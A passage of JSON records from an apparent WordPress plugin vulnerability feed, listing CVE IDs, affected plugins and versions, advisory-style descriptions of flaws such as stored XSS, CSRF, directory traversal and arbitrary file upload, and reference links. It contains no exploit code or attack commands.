il=&sfph_mail=&reponame=&new=3224709%40wp-polls%2Ftrunk&old=2949758%40wp-polls%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-polls\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-polls\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76de574-2627-46cd-9817-134a009ac3bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76de574-2627-46cd-9817-134a009ac3bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1769","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.5.0 via the download_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary log files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4df60fbe-4475-4cbf-b497-a9c5251bc91f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4df60fbe-4475-4cbf-b497-a9c5251bc91f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3101","slug":"amz-configurator-core","versionImpact":"1.4.7","description":"The Configurator Theme Core plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.4.7. This is due to the plugin not properly validating user meta fields prior to updating them in the database. This makes it possible for authenticated attackers, with Subscriber-level access and above, to escalate their privileges to Administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/configurator-woocommerce-wordpress-theme\\\/20474230\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/configurator-woocommerce-wordpress-theme\\\/20474230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535aa061-479f-415e-bee6-3151c42b917e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535aa061-479f-415e-bee6-3151c42b917e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10027","slug":"wp-property","description":"WP-Property plugin for WordPress through version 1.35.0 contains an unauthenticated file upload vulnerability in the third-party `uploadify.php` script. A remote attacker can upload arbitrary PHP files to a temporary directory without authentication, leading to remote code execution.","refs":"[{\"url\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150103065650\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-wp-property-shell-upload-vulnerability.html\",\"name\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150103065650\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-wp-property-shell-upload-vulnerability.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_property_upload_exec.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_property_upload_exec.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-property\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-property\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18987\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18987\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23651\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23651\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-wp-property-php-file-upload\",\"name\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-wp-property-php-file-upload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25065","slug":"wp-expand-tabs-free","versionImpact":"2.1.14","description":"Cross-Site Request Forgery (CSRF) vulnerability in ShapedPlugin WP Tabs \u2013 Responsive Tabs Plugin for WordPress plugin <= 2.1.14 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-expand-tabs-free\\\/wordpress-wp-tabs-responsive-tabs-plugin-for-wordpress-plugin-2-1-14-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-expand-tabs-free\\\/wordpress-wp-tabs-responsive-tabs-plugin-for-wordpress-plugin-2-1-14-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1921","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_start_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c7c61d-c110-448e-ad8a-bc1c00393524?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c7c61d-c110-448e-ad8a-bc1c00393524?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5911","slug":"wp-custom-cursors","versionImpact":"3.2","description":"The WP Custom Cursors | WordPress Cursor Plugin WordPress plugin through 3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dde0767d-1dff-4261-adbe-1f3fdf2d9aae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dde0767d-1dff-4261-adbe-1f3fdf2d9aae\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1379","slug":"website-article-monetization-by-magenet","versionImpact":"1.0.11","description":"The Website Article Monetization By MageNet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'abp_auth_key' parameter in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping and a missing authorization check. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8564dbb-6be8-4999-be65-d28609e05451?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8564dbb-6be8-4999-be65-d28609e05451?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-article-monetization-by-magenet\\\/trunk\\\/admin\\\/article-backlinks-admin.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-article-monetization-by-magenet\\\/trunk\\\/admin\\\/article-backlinks-admin.php#L110\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5666","slug":"extensions-for-elementor","versionImpact":"2.0.30","description":"The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter within the EE Button widget in all versions up to, and including, 2.0.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63306df3-4972-426f-bfda-6af75a09971c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63306df3-4972-426f-bfda-6af75a09971c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/button\\\/widgets\\\/ee-button.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/button\\\/widgets\\\/ee-button.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104024\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104024\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9064","slug":"inline-svg-elementor","versionImpact":"1.2.0","description":"The Elementor Inline SVG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aab3dea-5d14-4316-9a4c-97b0d30762bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aab3dea-5d14-4316-9a4c-97b0d30762bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-svg-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-svg-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9967","slug":"wp-show-more","versionImpact":"1.0.7","description":"The WP show more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's show_more shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de269b5-7262-45c8-8819-00982f196597?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de269b5-7262-45c8-8819-00982f196597?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-show-more\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-show-more\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11935","slug":"email-address-obfuscation","versionImpact":"1.0.1","description":"The Email Address Obfuscation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-address-obfuscation\\\/trunk\\\/email-address-obfuscation.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-address-obfuscation\\\/trunk\\\/email-address-obfuscation.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201993\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201993\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-address-obfuscation\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-address-obfuscation\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b777b19-ca0a-4082-80ee-e18a31ba6308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b777b19-ca0a-4082-80ee-e18a31ba6308?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12611","slug":"school-management","versionImpact":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'title' parameter in all versions up to, and including, 93.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45ada7a4-466b-4e73-8869-e1178e4fc67a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45ada7a4-466b-4e73-8869-e1178e4fc67a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10026","slug":"asset-manager","description":"The WordPress plugin Asset-Manager version 2.0 and below contains an unauthenticated arbitrary file upload vulnerability in upload.php. The endpoint fails to properly validate and restrict uploaded file types, allowing remote attackers to upload malicious PHP scripts to a predictable temporary directory. Once uploaded, the attacker can execute the file via a direct HTTP GET request, resulting in remote code execution under the web server\u2019s context.","refs":"[{\"url\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150106144832\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-asset-manager-shell-upload-vulnerability.html\",\"name\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150106144832\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-asset-manager-shell-upload-vulnerability.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_asset_manager_upload_exec.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_asset_manager_upload_exec.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/asset-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/asset-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18993\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18993\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23652\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23652\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-asset-manager-php-file-upload\",\"name\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-asset-manager-php-file-upload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-46862","slug":"quiz-master-next","versionImpact":"8.0.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master \u2013 Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-7-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-7-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1920","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_purgecache_varnish_callback function. This makes it possible for unauthenticated attackers to purge the varnish cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8e90994-3b5c-4ae6-a27f-890a9101b440?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8e90994-3b5c-4ae6-a27f-890a9101b440?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5337","slug":"formforall","versionImpact":"1.2","description":"The Contact form Form For All plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formforall' shortcode in versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formforall\\\/trunk\\\/formforall_common.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formforall\\\/trunk\\\/formforall_common.php#L21\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe2f596-b2c3-49d3-b646-0f4b64f15674?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe2f596-b2c3-49d3-b646-0f4b64f15674?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-25594","slug":"my-waze","versionImpact":"1.6","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Savvy Wordpress Development MyWaze allows Stored XSS.This issue affects MyWaze: from n\/a through 1.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/my-waze\\\/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/my-waze\\\/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1325","slug":"woomotiv","versionImpact":"3.4.3","description":"The Live Sales Notification for Woocommerce \u2013 Woomotiv plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.3. This is due to missing or incorrect nonce validation on the 'ajax_cancel_review' function. This makes it possible for unauthenticated attackers to reset the site's review count via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/tags\\\/3.4.1\\\/lib\\\/class-backend.php#L495\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/tags\\\/3.4.1\\\/lib\\\/class-backend.php#L495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woomotiv\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woomotiv\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9057","slug":"curatorio","versionImpact":"1.9","description":"The Curator.io: Show all your social media posts in a beautiful feed. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018feed_id\u2019 attribute in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/953d64f2-a514-48e9-9ab3-f9a793ad953a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/953d64f2-a514-48e9-9ab3-f9a793ad953a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/curatorio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/curatorio\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9853","slug":"idsk-toolkit","versionImpact":"1.7.2","description":"The ID-SK Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001b452e-3f8a-4605-b77a-ba8fbd0d79d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001b452e-3f8a-4605-b77a-ba8fbd0d79d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idsk-toolkit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idsk-toolkit\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8962","slug":"wpbits-addons-for-elementor","versionImpact":"1.5.2","description":"The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/elementor-config.php#L721\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/elementor-config.php#L721\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200392\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200392\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f735f05d-8178-46bd-894d-49ccfb31d304?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f735f05d-8178-46bd-894d-49ccfb31d304?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12528","slug":"wp-survey-and-poll","versionImpact":"1.7.5","description":"The WordPress Survey & Poll \u2013 Quiz, Survey and Poll Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpsurveypoll_results' shortcode in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 